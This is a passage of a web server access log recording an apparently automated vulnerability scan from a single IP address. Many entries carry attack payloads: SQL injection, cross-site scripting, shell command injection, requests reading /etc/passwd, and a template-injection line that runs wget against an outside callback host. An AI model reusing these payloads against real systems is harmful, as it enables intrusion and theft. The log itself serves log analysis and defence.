-0400] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:35:47 -0400] "POST /api/agent/tabs/agentData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:08:36:30 -0400] "GET /navigate/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - 
[24/Apr/2025:08:37:11 -0400] "POST /ubus/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:37:11 -0400] "POST /admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:08:37:19 -0400] "GET /admin/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:37:19 -0400] "POST /dfsms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:37:23 -0400] "POST /ccms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:37:25 -0400] "GET /page?id=2w9rfVE79pUqgGY2l3lMuuFV7vN&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d04qr7ij4pq19d75k4901ja9jpwrnwnwp.oast.online%27);s HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" 154.84.62.234 - - [24/Apr/2025:08:37:25 -0400] "GET /dfsms/add-category.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:37:28 -0400] "GET /ccms/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:37:39 -0400] "POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:08:38:38 -0400] "POST /conf_mail.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:39:03 -0400] "GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:39:06 -0400] "PUT /v1/agent/check/register HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:39:15 -0400] "PUT /v1/agent/check/deregister/2w9rfVyurgqvm2b9gc7eg5m33Bs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:39:46 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:08:40:10 -0400] "POST /ztp/cgi-bin/handler HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:40:14 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:08:40:16 -0400] "POST /app/options.py HTTP/1.1" 403 1242 "https://mgrokokbet.id/app/login.py" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:40:22 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:08:40:23 -0400] "POST /fileupload/toolsAny HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 
Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:08:40:33 -0400] "GET /authenticationendpoint/2w9rfc6qpacaof1wzxm6o8lfj97.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:40:36 -0400] "GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:08:41:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:08:41:21 -0400] "GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:42:48 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:42:54 -0400] "GET /live_check.shtml HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:43:36 -0400] "POST /classes/Master.php?f=delete_request HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:43:49 -0400] "POST /classes/Master.php?f=delete_team HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:44:00 -0400] "POST /classes/Master.php?f=delete_inquiry HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:09 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:16 -0400] "GET /admin/index.php?page=home HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:34 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.26" 154.84.62.234 - - [24/Apr/2025:08:45:41 -0400] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:43 -0400] "POST /hms/doctor/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:46:05 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:46:09 -0400] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:46:11 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:46:13 -0400] "POST /login.php HTTP/1.1" 200 0 "\"><script>alert(document.domain)</script><\"" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:46:17 -0400] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 
403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:46:28 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:46:32 -0400] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:08:46:40 -0400] "GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:08:46:50 -0400] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:46:54 -0400] "GET /backupsettings.dat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.25" 154.84.62.234 - - [24/Apr/2025:08:47:03 -0400] "GET /sysinit.shtml?r=52300 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" 154.84.62.234 - - [24/Apr/2025:08:47:11 -0400] "GET /set_safety.shtml?r=52300 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:08:47:25 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:47:39 -0400] "POST /templates/default/html/windows/right.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:47:39 -0400] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:08:48:04 -0400] "GET /ws-api/v2/users/me/details?token=02 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:08:48:48 -0400] "GET /delsnap.pl?name=|id HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:48:48 -0400] "POST /hms/admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:08:48:57 -0400] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:49:03 -0400] "POST /xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:08:50:11 -0400] "GET /wnm/login/login.json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10" 154.84.62.234 - - [24/Apr/2025:08:50:11 -0400] "POST /webapi/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:08:51:10 -0400] "POST /mod/lti/auth.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] 
"GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:52:45 -0400] "POST /fw.login.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:08:53:03 -0400] 
"GET /login.zul HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:53:16 -0400] "GET /rest/api/latest/repos HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:53:37 -0400] "POST /api/v2/open/rowsInfo HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:53:57 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:54:03 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:54:09 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:54:33 -0400] "GET //%5coast.me HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:55:18 -0400] "POST /hms/user-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:08:55:38 -0400] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:55:46 -0400] "GET /api/subscriber HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 
Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:55:47 -0400] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:55:52 -0400] "GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:56:40 -0400] "POST /servlets/OmaDsServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:08:57:06 -0400] "GET /navpage.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:57:07 -0400] "POST /configWizard/keyUpload.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:57:18 -0400] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1 20.51" 154.84.62.234 - - [24/Apr/2025:08:57:38 -0400] "POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:08:57:43 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - 
[24/Apr/2025:08:58:04 -0400] "POST /controller/ping.php HTTP/1.1" 200 0 "https://mgrokokbet.id/controller/ping.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:58:13 -0400] "POST /task/loginValidation.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:08:59:23 -0400] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:59:32 -0400] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:08:59:55 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.24 (KHTML, like Gecko) Version/17.2 Safari/616.24" 154.84.62.234 - - [24/Apr/2025:09:00:09 -0400] "GET /index.php/user/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:00:35 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:00:43 -0400] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:00:47 -0400] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:05 -0400] "POST /network_test.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:04 -0400] "GET /goform/downloadSyslog/syslog.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:01:10 -0400] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:55 -0400] "GET /api/v2/cmdb/system/admin HTTP/1.1" 200 0 "-" "Node.js" 154.84.62.234 - - [24/Apr/2025:09:02:01 -0400] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 200 0 "-" "Report Runner" 154.84.62.234 - - [24/Apr/2025:09:02:25 -0400] "GET /ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:02:30 -0400] "GET /ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 154.84.62.234 - - [24/Apr/2025:09:02:58 -0400] "GET /index.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - admin [24/Apr/2025:09:03:10 -0400] "POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:03:19 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 
